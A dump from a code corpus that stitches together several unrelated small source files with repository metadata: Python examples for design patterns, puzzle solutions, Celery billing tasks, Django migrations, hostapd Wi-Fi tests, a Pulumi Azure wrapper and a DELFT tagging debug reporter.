class SUV(ABC):
@abstractclassmethod
def create_suv(self):
pass
class Coupe(ABC):
@abstractclassmethod
def create_coupe(self):
pass
#------------------------------------------------
# Benz
class Gla(SUV):
def create_suv(self):
print("this is your Gla SUV Benz...")
class Cls(Coupe):
def create_coupe(self):
print("this is your cls coupe Benz...")
#---------------------------------------------------
# BMW
class X1(SUV):
def create_suv(self):
print("this is your X1 SUV BMW .... ")
class M2(Coupe):
def create_coupe(self):
print("this is your me coupe BMW ....")
#------------------------------------------------------
def client_suv_order(order):
suv = order.call_suv()
suv.create_suv()
def client_coupe_order(order):
coupe= order.call_coupe()
coupe.create_coupe()
#----------------------------------------------------------
client_coupe_order(Benz())
client_coupe_order(Bmw())
client_suv_order(Benz())
client_suv_order(Bmw())
|
[
"="
] |
=
|
99a2478cea3c8d541d34c24dfcb9bc4ca59b0605
|
73b8aba05ee1424f38a8598a9f1305185588075f
|
/0x04-python-more_data_structures/9-multiply_by_2.py
|
6a475a580fe3f50723c6e049968a98f01637a6dd
|
[] |
no_license
|
nicolasportela/holbertonschool-higher_level_programming
|
0d176c0e56f4f703c1e9a98b430fc6120f22f675
|
e1537b81f21118456e5cfa0e4ed89520b232adb6
|
refs/heads/master
| 2023-04-20T21:30:22.693434 | 2021-05-13T01:47:30 | 2021-05-13T01:47:30 | 319,397,633 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 153 |
py
|
#!/usr/bin/python3
def multiply_by_2(a_dictionary):
new_dic = {}
for k, v in a_dictionary.items():
new_dic[k] = v * 2
return new_dic
|
[
"[email protected]"
] | |
aa2ad8ba0ff14340d3d7d30cd9b8fb24c00f071c
|
6820e74ec72ed67f6b84a071cef9cfbc9830ad74
|
/plans/tasks.py
|
22acd6cb6cb911b7571adefb4585bd699ce306c6
|
[
"MIT"
] |
permissive
|
AppforallHQ/f5
|
96c15eaac3d7acc64e48d6741f26d78c9ef0d8cd
|
0a85a5516e15d278ce30d1f7f339398831974154
|
refs/heads/master
| 2020-06-30T17:00:46.646867 | 2016-11-21T11:41:59 | 2016-11-21T11:41:59 | 74,357,925 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,047 |
py
|
from celery import task
from django.utils import timezone
from datetime import timedelta
import requests
import json
class EndpointNotAvailabe(Exception):
pass
def call_external_endpoint_to_update_status(the_task, action, subscription):
payload = {"uuid": subscription.uuid,
"plan": subscription.plan.pk,
"activate": (action == "activate"),
}
response = requests.put(
subscription.plan.interaction_endpoint_url % payload,
data=json.dumps(payload))
if response.status_code != 200:
e = EndpointNotAvailabe()
raise the_task \
.retry(args=[subscription], exc=e)
else:
return True
@task
def send_invoice_notification(invoice, email_type, **kwargs):
return
import requests
payload = {
"invoice_payment_url": invoice.payment_url,
"email_type": email_type,
"uuid": invoice.subscription.uuid,
"plan": invoice.subscription.plan.pk,
}
mail_body_response = requests.post(
invoice.subscription.plan.mail_endpoint_url % payload,
data=json.dumps(payload))
params = json.loads(mail_body_response.text)
from .actions import send_mail
send_mail(invoice, params, email_type)
@task(default_retry_delay=3*60)
def activate_subscription(subscription, **kwargs):
pass#return call_external_endpoint_to_update_status(activate_subscription, "activate", subscription)
@task(default_retry_delay=3*60)
def deactivate_subscription(subscription, **kwargs):
return call_external_endpoint_to_update_status(deactivate_subscription, "deactivate", subscription)
@task
def send_preinvoice():
from plans.models import Subscription
# FIXME
for subscription in Subscription.objects.filter():
if subscription.due_date < timezone.now() + timedelta(days=subscription.plan.preinvoice_length) \
and subscription.status == Subscription.ACTIVE:
subscription.status = Subscription.PREINVOICE
subscription.full_clean()
subscription.save()
@task
def mark_subscriptions_as_overdue():
from plans.models import Subscription
# FIXME
for subscription in Subscription.objects.filter():
if subscription.due_date < timezone.now() and subscription.status == Subscription.PREINVOICE:
subscription.status = Subscription.OVERDUE
subscription.full_clean()
subscription.save()
@task
def end_gracetime_for_fucking_users():
from plans.models import Subscription
# FIXME
for subscription in Subscription.objects.filter():
if subscription.due_date + timedelta(days=subscription.plan.overdue_length) < timezone.now():
subscription.status = Subscription.DEACTIVE
subscription.full_clean()
subscription.save()
@task
def invalidate_invoices():
from plans.models import Invoice
# FIXME
for invoice in Invoice.objects.filter():
if invoice.expires_at < timezone.now():
invoice.mark_as_invalid()
|
[
"[email protected]"
] | |
753271955f78deae3afbada6c0d93276ade8e340
|
03bca281c8bb3ba69c3a01252cc7c9e35cd675bd
|
/django/DCC/dccApp/migrations/0001_initial.py
|
63c611642310e159928a36aac3c2066355be6090
|
[] |
no_license
|
satish15625/pythonwork
|
380fef04170064aef8aeb919a4e30f65db9a097f
|
12d776152689a84f1560d08f35987f8ca4ea3fb0
|
refs/heads/master
| 2023-07-07T15:12:48.355226 | 2021-08-13T06:33:13 | 2021-08-13T06:33:13 | 374,058,740 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 562 |
py
|
# Generated by Django 3.0.7 on 2020-12-15 12:25
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='UploadImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('image_Img', models.ImageField(upload_to='images/')),
],
),
]
|
[
"[email protected]"
] | |
4eec63edb5849bedfb3c1094f0944238a960f578
|
a81d84fdb57e1b90812fc5b5b523685ba5b663c0
|
/python/2021_04/Question0769.py
|
648c3a58f644d02e661df59e3decc996ad812c3d
|
[] |
no_license
|
KujouNozom/LeetCode
|
1919081001126924daa7549493a0823702631a37
|
4de1e601274de1336d669e41f732a8cb056880b9
|
refs/heads/master
| 2023-07-17T12:17:45.156451 | 2021-09-04T11:57:40 | 2021-09-04T11:57:40 | 268,075,373 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 516 |
py
|
# 769. 最多能完成排序的块 [双指针]
from typing import List
class Solution:
def maxChunksToSorted(self, arr: List[int]) -> int:
min_value, max_value, start = 10, -1, 0
ans = 0
for index in range(len(arr)):
min_value = min(min_value, arr[index])
max_value = max(max_value, arr[index])
if min_value == start and max_value == index:
ans += 1
min_value, max_value, start = 10, -1, index + 1
return ans
|
[
"[email protected]"
] | |
8e902e4e628a8d138844e6ee81c87d0dc785a0b1
|
4674b8088ffdf55905d44995f08a0792a3e4cd5c
|
/tests/hwsim/test_monitor_interface.py
|
bfc9a1562ff2e5c9fb7ee4dc4b08dfa12334195f
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
vanhoefm/krackattacks-scripts
|
41daca791638a92aa4cfa68a582e46119037560e
|
4b78669686f74efe664c6543b1b5b1616b22f902
|
refs/heads/research
| 2022-10-29T20:21:11.512335 | 2022-10-16T18:44:41 | 2022-10-16T18:44:41 | 107,408,514 | 2,184 | 577 |
NOASSERTION
| 2021-07-06T12:43:49 | 2017-10-18T12:58:08 |
C
|
UTF-8
|
Python
| false | false | 3,271 |
py
|
# AP mode using the older monitor interface design
# Copyright (c) 2013, Jouni Malinen <[email protected]>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
from remotehost import remote_compatible
import logging
logger = logging.getLogger()
import time
import hwsim_utils
import hostapd
from wpasupplicant import WpaSupplicant
def test_monitor_iface_open(dev, apdev):
"""Open connection using cfg80211 monitor interface on AP"""
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="use_monitor=1")
id = wpas.add_network()
wpas.set_network(id, "mode", "2")
wpas.set_network_quoted(id, "ssid", "monitor-iface")
wpas.set_network(id, "key_mgmt", "NONE")
wpas.set_network(id, "frequency", "2412")
wpas.connect_network(id)
dev[0].connect("monitor-iface", key_mgmt="NONE", scan_freq="2412")
def test_monitor_iface_wpa2_psk(dev, apdev):
"""WPA2-PSK connection using cfg80211 monitor interface on AP"""
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="use_monitor=1")
id = wpas.add_network()
wpas.set_network(id, "mode", "2")
wpas.set_network_quoted(id, "ssid", "monitor-iface-wpa2")
wpas.set_network(id, "proto", "WPA2")
wpas.set_network(id, "key_mgmt", "WPA-PSK")
wpas.set_network_quoted(id, "psk", "12345678")
wpas.set_network(id, "pairwise", "CCMP")
wpas.set_network(id, "group", "CCMP")
wpas.set_network(id, "frequency", "2412")
wpas.connect_network(id)
dev[0].connect("monitor-iface-wpa2", psk="12345678", scan_freq="2412")
def test_monitor_iface_multi_bss(dev, apdev):
"""AP mode mmonitor interface with hostapd multi-BSS setup"""
params = { "ssid": "monitor-iface", "driver_params": "use_monitor=1" }
hapd = hostapd.add_ap(apdev[0], params)
hostapd.add_bss(apdev[0], apdev[0]['ifname'] + '-2', 'bss-2.conf')
dev[0].connect("monitor-iface", key_mgmt="NONE", scan_freq="2412")
dev[1].connect("bss-2", key_mgmt="NONE", scan_freq="2412")
@remote_compatible
def test_monitor_iface_unknown_sta(dev, apdev):
"""AP mode monitor interface and Data frame from unknown STA"""
ssid = "monitor-iface-pmf"
passphrase = "12345678"
params = hostapd.wpa2_params(ssid=ssid, passphrase=passphrase)
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
params['driver_params'] = "use_monitor=1"
hapd = hostapd.add_ap(apdev[0], params)
bssid = apdev[0]['bssid']
addr = dev[0].p2p_interface_addr()
dev[0].connect(ssid, psk=passphrase, ieee80211w="2",
key_mgmt="WPA-PSK-SHA256", proto="WPA2",
scan_freq="2412")
dev[0].request("DROP_SA")
# This protected Deauth will be ignored by the STA
hapd.request("DEAUTHENTICATE " + addr)
# But the unprotected Deauth from TX frame-from-unassoc-STA will now be
# processed
dev[0].request("DATA_TEST_CONFIG 1")
dev[0].request("DATA_TEST_TX " + bssid + " " + addr + " 0")
dev[0].request("DATA_TEST_CONFIG 0")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=5)
if ev is None:
raise Exception("No disconnection")
dev[0].request("DISCONNECT")
|
[
"[email protected]"
] | |
efc0ff16e064e56e714719076065e0481806106e
|
951e433b25a25afeea4d9b45994a57e0a6044144
|
/LeetCode/Q187_HM_findRepeatedDnaSequences.py
|
4be93e56f1f5ce25527e7b244bc6bc2c45797d72
|
[] |
no_license
|
EricaEmmm/CodePython
|
7c401073e0a9b7cd15f9f4a553f0aa3db1a951a3
|
d52aa2a0bf71b5e7934ee7bff70d593a41b7e644
|
refs/heads/master
| 2020-05-31T14:00:34.266117 | 2019-09-22T09:48:23 | 2019-09-22T09:48:23 | 190,318,878 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,045 |
py
|
# 重复的DNA序列
# 所有 DNA 由一系列缩写为 A,C,G 和 T 的核苷酸组成,例如:“ACGAATTCCG”。在研究 DNA 时,识别 DNA 中的重复序列有时会对研究非常有帮助
# 编写一个函数来查找 DNA 分子中所有出现超多一次的10个字母长的序列(子串)。
#
# 示例:
# 输入: s = "AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT"
# 输出: ["AAAAACCCCC", "CCCCCAAAAA"]
class Solution(object):
def findRepeatedDnaSequences(self, s):
"""
:type s: str
:rtype: List[str]
"""
res = dict()
if len(s) < 10:
return res
for i in range(len(s)-9):
tmp = s[i:i+10]
res[tmp] = res.get(tmp,0) + 1 # 返回指定键的值,如果值不在字典中返回default值
return list([i for i in res.keys() if res[i] > 1])
if __name__ == '__main__':
s = Solution()
tmp = "AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT"
print(s.findRepeatedDnaSequences(tmp))
# st = "abc"
# t = [1,2,3]
# print(st[0:3])
|
[
"[email protected]"
] | |
6c172d1d135b205d3134c570b5fea04025c05ba2
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02578/s304732693.py
|
fd8ac3cded43971a72e3cf659d1486c121afa2f5
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 234 |
py
|
n = int(input())
input_line = input().split()
member = [int(input_line[i]) for i in range(n)]
stands = 0
for i in range(1,n):
stand = member[i-1] - member[i]
if stand > 0:
stands += stand
member[i] += stand
print(stands)
|
[
"[email protected]"
] | |
b594ea5d9c012feedfb6dd74228118ce0300906b
|
8d9318a33afc2c3b5ca8ac99fce0d8544478c94a
|
/Books/Casandra DB/opscenter-5.1.0/lib/py/html5lib/treebuilders/__init__.py
|
50c8deeb08c187d8b51fcfdcb742e414c6ee52ab
|
[] |
no_license
|
tushar239/git-large-repo
|
e30aa7b1894454bf00546312a3fb595f6dad0ed6
|
9ee51112596e5fc3a7ab2ea97a86ec6adc677162
|
refs/heads/master
| 2021-01-12T13:48:43.280111 | 2016-11-01T22:14:51 | 2016-11-01T22:14:51 | 69,609,373 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 129 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:b2a0b8030b4449b4e227ef389f48544f1136f27d0fc657128ee58812e529f7d3
size 4478
|
[
"[email protected]"
] | |
dda213c37af2f9c9c79342b1e51e552411080ec5
|
49ab501632b0a8336058406e7daa3afce6be6e93
|
/python_server/run_keras_server.py
|
14a25f5c8f258346bcedf3cf308c98eb4e1fbf53
|
[] |
no_license
|
CharlesFauman/meme_server
|
3ab73e9788b9fea26f6ea270563381515d4b0d47
|
75b0d6fc041c1e2b04e260e9eecbff160225a0f6
|
refs/heads/master
| 2020-03-25T08:58:32.780593 | 2018-08-05T19:24:58 | 2018-08-05T19:24:58 | 143,640,946 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,029 |
py
|
# USAGE
# Start the server:
# python run_keras_server.py
# Submit a request via cURL:
# curl -X POST -F [email protected] 'http://localhost:5000/predict'
# Submita a request via Python:
# python simple_request.py
# import the necessary packages
import numpy as np
from threading import Thread
import flask
import redis
import uuid
import time
import json
import sys
import io
# initialize constants used for server queuing
PROCESSING_QUEUE = "processing_queue"
BATCH_SIZE = 32
SERVER_SLEEP = 0.25
CLIENT_SLEEP = 0.25
# initialize our Flask application, Redis server, and Keras model
app = flask.Flask(__name__)
db = redis.StrictRedis(host="localhost", port=6379, db=0)
db.flushdb()
print("* Loading model...")
import meme_model as model
print("* Model loaded")
def classify_process():
# continually pool for new inputs to classify
while True:
# attempt to grab a batch of inputs from the database, then
# initialize the input IDs and batch of inputs themselves
queue = db.lrange(PROCESSING_QUEUE, 0, BATCH_SIZE - 1)
inputIDs = []
batch = None
# loop over the queue
for q in queue:
# deserialize the object and obtain the input
q = json.loads(q)
input_ = model.preprocess_deserialize(q["input"])
# check to see if the batch list is None
if batch is None:
batch = input_
# otherwise, stack the data
else:
batch = np.vstack([batch, input_])
# update the list of input IDs
inputIDs.append(q["id"])
# check to see if we need to process the batch
if len(inputIDs) > 0:
# classify the batch
print("* Batch size: {}".format(batch.shape))
preds = model.process(batch)
preds = model.postprocess_serialize(preds)
# loop over the image IDs and their corresponding set of
# results from our model
for (inputID, result) in zip(inputIDs, preds):
db.set(inputID, json.dumps(result))
# remove the set of images from our queue
db.ltrim(PROCESSING_QUEUE, len(inputIDs), -1)
# sleep for a small amount
time.sleep(SERVER_SLEEP)
@app.route("/predict", methods=["POST"])
def predict():
# initialize the data dictionary that will be returned from the
# view
data = {"success": False}
print("predicting!")
# ensure an input was properly uploaded to our endpoint
if flask.request.method == "POST":
print("was post!")
input_form = None
input_files = None
if(flask.request.form.get("input")):
input_form = flask.request.form.get("input")
if(flask.request.files.get("input")):
input_files = flask.request.files.get("input").read()
if input_form or input_files:
input_ = model.preprocess_serialize(input_form, input_files)
# generate an ID for the classification then add the
# classification ID + input to the queue
k = str(uuid.uuid4())
d = {"id": k, "input": input_}
db.rpush(PROCESSING_QUEUE, json.dumps(d))
# keep looping until our model server returns the output
# predictions
while True:
# attempt to grab the output predictions
output = db.get(k)
# check to see if our model has classified the input
if output is not None:
# add the output predictions to our data
# dictionary so we can return it to the client
data["predictions"] = json.loads(output)
# delete the result from the database and break
# from the polling loop
db.delete(k)
break
# sleep for a small amount to give the model a chance
# to classify the input
time.sleep(CLIENT_SLEEP)
# indicate that the request was a success
data["success"] = True
# return the data dictionary as a JSON response
return flask.jsonify(data)
# if this is the main thread of execution first load the model and
# then start the server
if __name__ == "__main__":
# load the function used to classify input images in a *separate*
# thread than the one used for main classification
print("* Starting model service...")
t = Thread(target=classify_process, args=())
t.daemon = True
t.start()
# start the web server
print("* Starting web service...")
app.run()
|
[
"[email protected]"
] | |
8f9536c2451f1c553693aed0b4015a05647789bf
|
4b95aeb2533f0a582cea2fb26d6177e94aabb21f
|
/2020/src/lobby_layout.py
|
3bba605d05757a8dc9695996a0304392f18ef81b
|
[] |
no_license
|
MarcoBurgos/advent_of_code
|
0d9984e0fa47f68e52ef0f5cdf7681e23767bd16
|
81ac54bfe200cc348efbe860bd95aae4270f03b7
|
refs/heads/main
| 2023-02-09T14:40:38.204271 | 2020-12-26T00:09:36 | 2020-12-26T00:09:36 | 317,739,393 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,687 |
py
|
import sys
from utils import read_and_load_input
VECTORS = {
'w' : (-4, 0),
'e' : ( 4, 0),
'nw': (-2, -3),
'ne': ( 2, -3),
'sw': (-2, 3),
'se': ( 2, 3),
}
def parse(line):
result = []
while line:
stepLength = 1 if line[0] in ('e', 'w') else 2
result.append(line[:stepLength])
line = line[stepLength:]
return result
def walk(path):
x, y = 0, 0
for step in path:
dx, dy = VECTORS[step]
x += dx
y += dy
return x, y
def lobby_layout_1():
result = set()
for path in tiles:
tile = walk(path)
if tile in result:
result.remove(tile)
else:
result.add(tile)
return result
def neighbors(tile):
yield from ((tile[0] + dx, tile[1] + dy) for dx, dy in VECTORS.values())
def lobby_layout_2(blackTiles):
for day in range(100):
newTiles = set()
affectedTiles = blackTiles.copy()
for tile in blackTiles:
affectedTiles.update(neighbors(tile))
for tile in affectedTiles:
numNeighbors = sum(n in blackTiles for n in neighbors(tile))
if tile in blackTiles:
if numNeighbors in (1, 2):
newTiles.add(tile)
else:
if numNeighbors == 2:
newTiles.add(tile)
blackTiles = newTiles
return len(blackTiles)
if __name__ == '__main__':
input_data = read_and_load_input("Day24")
tiles = [parse(line.rstrip()) for line in input_data]
blackTiles = lobby_layout_1()
print(f"Solution 1: {len(blackTiles)}")
print(f"Solution 2: {lobby_layout_2(blackTiles)}")
|
[
"[email protected]"
] | |
04c0a9aa06b8567653908c8159d470bb3be89b2d
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_200/5468.py
|
063e5c8d196c9bfcca7a5d638432897002ca1793
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 290 |
py
|
dirt=[]
k=1
t=input()
for j in range(t):
n=input();w=n
while(w):
c=0;g=n%10
n=w;q=(n)%10;m=-2
while(n):
d=n%10
if c>=1:
if q<d:
break
q=d;n/=10;
c+=1;g=d
if n==0:
dirt.append(w)
break
w=w-1
for i in dirt:
print "Case #{0}: {1}".format(k,i)
k+=1
|
[
"[email protected]"
] | |
a5ddd507e15815aaad86ceaaa47e2a295133f13d
|
48e124e97cc776feb0ad6d17b9ef1dfa24e2e474
|
/sdk/python/pulumi_azure_native/devices/v20160203/list_iot_hub_resource_keys.py
|
42ce719ca651ad316e0363197087b52eff4ffe47
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
bpkgoud/pulumi-azure-native
|
0817502630062efbc35134410c4a784b61a4736d
|
a3215fe1b87fba69294f248017b1591767c2b96c
|
refs/heads/master
| 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,383 |
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'ListIotHubResourceKeysResult',
'AwaitableListIotHubResourceKeysResult',
'list_iot_hub_resource_keys',
'list_iot_hub_resource_keys_output',
]
@pulumi.output_type
class ListIotHubResourceKeysResult:
"""
The list of shared access policies with a next link.
"""
def __init__(__self__, next_link=None, value=None):
if next_link and not isinstance(next_link, str):
raise TypeError("Expected argument 'next_link' to be a str")
pulumi.set(__self__, "next_link", next_link)
if value and not isinstance(value, list):
raise TypeError("Expected argument 'value' to be a list")
pulumi.set(__self__, "value", value)
@property
@pulumi.getter(name="nextLink")
def next_link(self) -> str:
"""
The next link.
"""
return pulumi.get(self, "next_link")
@property
@pulumi.getter
def value(self) -> Optional[Sequence['outputs.SharedAccessSignatureAuthorizationRuleResponse']]:
"""
The list of shared access policies.
"""
return pulumi.get(self, "value")
class AwaitableListIotHubResourceKeysResult(ListIotHubResourceKeysResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return ListIotHubResourceKeysResult(
next_link=self.next_link,
value=self.value)
def list_iot_hub_resource_keys(resource_group_name: Optional[str] = None,
resource_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableListIotHubResourceKeysResult:
"""
The list of shared access policies with a next link.
:param str resource_group_name: The name of the resource group that contains the IoT hub.
:param str resource_name: The name of the IoT hub.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['resourceName'] = resource_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:devices/v20160203:listIotHubResourceKeys', __args__, opts=opts, typ=ListIotHubResourceKeysResult).value
return AwaitableListIotHubResourceKeysResult(
next_link=__ret__.next_link,
value=__ret__.value)
@_utilities.lift_output_func(list_iot_hub_resource_keys)
def list_iot_hub_resource_keys_output(resource_group_name: Optional[pulumi.Input[str]] = None,
resource_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[ListIotHubResourceKeysResult]:
"""
The list of shared access policies with a next link.
:param str resource_group_name: The name of the resource group that contains the IoT hub.
:param str resource_name: The name of the IoT hub.
"""
...
|
[
"[email protected]"
] | |
e7f28841c3cab7b1b034f5d0de68744734459162
|
f8c35a47c7199aed0747e91e5c36ec97e7543de1
|
/custom/icds_reports/management/commands/generate_migration_tables.py
|
868e4fe59a2acf305643ee8eed39d62f19f82f18
|
[] |
no_license
|
dr-aryone/commcare-hq
|
13a3f2a39382e3f6fe1f19d6c08bb61b808c146d
|
3e7e09247fc8d1246ccfc77c1fff8603c9f65228
|
refs/heads/master
| 2020-05-27T14:29:48.923458 | 2019-05-26T00:01:33 | 2019-05-26T00:01:33 | 188,650,727 | 2 | 1 | null | 2019-05-26T07:03:18 | 2019-05-26T07:03:18 | null |
UTF-8
|
Python
| false | false | 6,056 |
py
|
from __future__ import absolute_import, print_function
from __future__ import unicode_literals
import logging
import re
import sqlite3
from django.core.management import CommandError
from django.core.management.base import BaseCommand
from sqlalchemy import inspect as sqlinspect
from corehq.apps.userreports.models import StaticDataSourceConfiguration
from corehq.apps.userreports.util import get_indicator_adapter, UCR_TABLE_PREFIX
from corehq.sql_db.connections import connection_manager
from custom.icds_reports.const import DASHBOARD_DOMAIN
from custom.icds_reports.management.commands.create_citus_child_tables import keep_child_tables, plain_tables, \
drop_child_tables, get_parent_child_mapping
from custom.icds_reports.models import AggregateSQLProfile
logger = logging.getLogger(__name__)
IGNORE_TABLES = {
'django_migrations',
AggregateSQLProfile._meta.db_table,
'ucr_table_name_mapping',
}
CREATE_TABLE = """
CREATE TABLE IF NOT EXISTS tables (
id integer PRIMARY KEY,
source_table text NOT NULL,
date text,
target_table text,
migrated integer
); """
def get_all_tables(connection):
res = connection.execute("select tablename from pg_tables where schemaname = 'public'")
return {row.tablename for row in res}
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('output_database')
parser.add_argument(
'--source-engine-id', default='icds-ucr',
help='Django alias for source database'
)
def handle(self, output_database, source_engine_id, **options):
with connection_manager.get_engine(source_engine_id).begin() as conn:
self.parent_child_mapping = get_parent_child_mapping(conn)
self.child_parent_mapping = {
child: parent
for parent, children in self.parent_child_mapping.items()
for child in children
}
self.table_count = 0
self.db = sqlite3.connect(output_database)
try:
self.setup_sqlite_db()
self.generate_dump_script(source_engine_id)
self.stdout.write("\n{} tables processed\n".format(self.table_count))
finally:
self.db.close()
def setup_sqlite_db(self):
with self.db:
self.db.execute(CREATE_TABLE)
res = self.db.execute('select count(*) from tables')
if res.fetchone()[0] > 0:
raise CommandError('Database already has records. Delete it and re-run command.')
def insert_row(self, row):
self.table_count += 1
with self.db:
self.db.execute('INSERT INTO tables(source_table, date, target_table) values (?,?,?)', row)
def generate_dump_script(self, source_engine_id):
self.seen_tables = set()
source_engine = connection_manager.get_engine(source_engine_id)
# direct dump and load from parent + child tables
with source_engine.begin() as source_conn:
insp = sqlinspect(source_conn)
for table in keep_child_tables + plain_tables:
for line in self.get_table_date_target(insp, table):
self.insert_row(line)
# direct dump and load from parent
# dump from all child tables into parent table
for table in drop_child_tables:
for line in self.get_table_date_target(insp, table, all_in_parent=True):
self.insert_row(line)
for datasource in StaticDataSourceConfiguration.by_domain(DASHBOARD_DOMAIN):
if source_engine_id == datasource.engine_id or source_engine_id in datasource.mirrored_engine_ids:
adapter = get_indicator_adapter(datasource)
table_name = adapter.get_table().name
# direct dump and load from parent
# dump from all child tables into parent table
# - if table is distrubuted, citus will distribute the data
# - if table is partitioned the triggers on the parent will distribute the data
for line in self.get_table_date_target(insp, table_name, all_in_parent=True):
self.insert_row(line)
all_tables = get_all_tables(source_conn)
remaining_tables = all_tables - self.seen_tables - IGNORE_TABLES
icds_ucr_prefix = '{}{}_'.format(UCR_TABLE_PREFIX, DASHBOARD_DOMAIN)
def keep_table(table):
root_table = self.child_parent_mapping.get(table, table)
return not root_table.startswith(UCR_TABLE_PREFIX) or root_table.startswith(icds_ucr_prefix)
remaining_tables = list(filter(keep_table, remaining_tables))
if remaining_tables:
self.stderr.write("Some tables not seen:")
for t in remaining_tables:
parent = self.child_parent_mapping.get(t)
if parent:
self.stderr.write("\t{} (parent: {})".format(t, parent))
else:
self.stderr.write("\t{}".format(t))
def get_table_date_target(self, sql_insepctor, table, all_in_parent=False):
yield table, None, None
self.seen_tables.add(table)
for child in self.parent_child_mapping[table]:
self.seen_tables.add(child)
yield child, get_table_date(sql_insepctor, child), table if all_in_parent else None
def get_table_date(sql_insepctor, table):
def _get_date(string):
match = re.match(r'.*(\d{4}-\d{2}-\d{2}).*', string)
if match:
return match.groups()[0]
date = _get_date(table)
if not date:
constraints = [
constraint for constraint in sql_insepctor.get_check_constraints(table)
if constraint['name'].startswith(table)
]
if constraints:
date = _get_date(constraints[0]['sqltext'])
return date
|
[
"[email protected]"
] | |
19aab88df7aec32b7971ae1f9f4d9863c192e9e8
|
965fe92b03b37d2e6fa700281c4ef383fb104ada
|
/sciencebeam_trainer_delft/sequence_labelling/debug.py
|
53a1befadf92215d50210611fddba0ded0508508
|
[
"MIT"
] |
permissive
|
elifesciences/sciencebeam-trainer-delft
|
1591bebb7f5b9ed178329f4e9e02a9d893ab228d
|
2413fe7f0801869208741e4ab6c4096db8d53b5e
|
refs/heads/develop
| 2022-05-20T21:55:13.210432 | 2022-03-28T17:32:31 | 2022-03-28T17:32:31 | 192,557,708 | 5 | 1 |
MIT
| 2022-03-28T17:33:14 | 2019-06-18T14:34:50 |
Python
|
UTF-8
|
Python
| false | false | 3,133 |
py
|
import os
import logging
import time
from contextlib import contextmanager
from pathlib import Path
from typing import IO, Iterator, Optional
import numpy as np
from sciencebeam_trainer_delft.sequence_labelling.tag_formatter import (
TagOutputFormats,
format_tag_result
)
LOGGER = logging.getLogger(__name__)
SCIENCEBEAM_DELFT_TAGGING_DEBUG_OUT = "SCIENCEBEAM_DELFT_TAGGING_DEBUG_OUT"
@contextmanager
def exclusive_prefixed_file(prefix: str, suffix: str = '') -> Iterator[IO]:
for index in range(1, 10000):
filename = '%s-%d%s' % (prefix, index, suffix)
try:
with open(filename, mode='x', encoding='utf-8') as fileobj:
yield fileobj
return
except FileExistsError:
continue
raise FileExistsError('could not create any prefixed file: %s, suffix: %s' % (prefix, suffix))
class TagDebugReporter:
def __init__(self, output_directory: str):
self.output_directory = output_directory
def get_base_output_name(self, model_name: str) -> str:
return os.path.join(self.output_directory, 'sciencebeam-delft-%s-%s' % (
round(time.time()),
model_name
))
def report_tag_results(
self,
texts: np.array,
features: np.array,
annotations,
model_name: str):
base_filename_prefix = self.get_base_output_name(model_name=model_name)
with exclusive_prefixed_file(base_filename_prefix, '.json') as json_fp:
output_file = json_fp.name
filename_prefix = os.path.splitext(output_file)[0]
LOGGER.info('tagger, output_file: %s', output_file)
format_tag_result_kwargs = dict(
tag_result=annotations,
texts=texts,
features=features,
model_name=model_name
)
formatted_text = format_tag_result(
output_format=TagOutputFormats.TEXT,
**format_tag_result_kwargs
)
Path(filename_prefix + '.txt').write_text(formatted_text, encoding='utf-8')
formatted_json = format_tag_result(
output_format=TagOutputFormats.JSON,
